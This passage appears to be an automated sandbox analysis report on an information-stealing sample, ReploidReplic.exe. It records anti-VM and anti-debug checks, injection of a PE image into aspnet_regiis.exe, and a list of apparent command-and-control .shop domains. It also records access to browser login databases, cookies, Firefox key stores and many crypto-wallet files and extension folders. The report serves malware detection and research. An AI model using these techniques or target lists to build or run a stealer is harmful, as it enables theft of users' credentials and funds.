                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: ReploidReplic.exe PID: 2312, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 1130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 52A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 62A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 63D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 73D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 7820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 8820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: 9820000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1352Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 1352Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1858552564.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1848093457.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002C96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DD910 LdrInitializeThunk,2_2_008DD910
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE12C6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE12C6A
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE12C39 mov eax, dword ptr fs:[00000030h]0_2_6CE12C39
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE11A65 mov eax, dword ptr fs:[00000030h]0_2_6CE11A65
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE1484C GetProcessHeap,0_2_6CE1484C
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE12C6A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE12C6A
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE102DA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE102DA
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE0FE01 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CE0FE01
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A0000 value starts with: 4D5AJump to behavior
                Source: ReploidReplic.exeString found in binary or memory: rabidcowse.shop
                Source: ReploidReplic.exeString found in binary or memory: cloudewahsj.shop
                Source: ReploidReplic.exeString found in binary or memory: tirepublicerj.shop
                Source: ReploidReplic.exeString found in binary or memory: noisycuttej.shop
                Source: ReploidReplic.exeString found in binary or memory: wholersorie.shop
                Source: ReploidReplic.exeString found in binary or memory: framekgirus.shop
                Source: ReploidReplic.exeString found in binary or memory: nearycrepso.shop
                Source: ReploidReplic.exeString found in binary or memory: abruptyopsn.shop
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A0000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A1000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E2000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E5000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8F3000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8A1000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E2000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8E5000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 8F3000Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A6C008Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE104A8 cpuid 0_2_6CE104A8
                Source: C:\Users\user\Desktop\ReploidReplic.exeQueries volume information: C:\Users\user\Desktop\ReploidReplic.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE0FF23 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CE0FF23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2492, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: aspnet_regiis.exe, 00000002.00000003.1848057911.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: aspnet_regiis.exe, 00000002.00000003.1804631888.0000000005208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: aspnet_regiis.exe, 00000002.00000002.1858662777.0000000002C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: aspnet_regiis.exe, 00000002.00000003.1848057911.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: aspnet_regiis.exe, 00000002.00000003.1822783815.0000000002CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
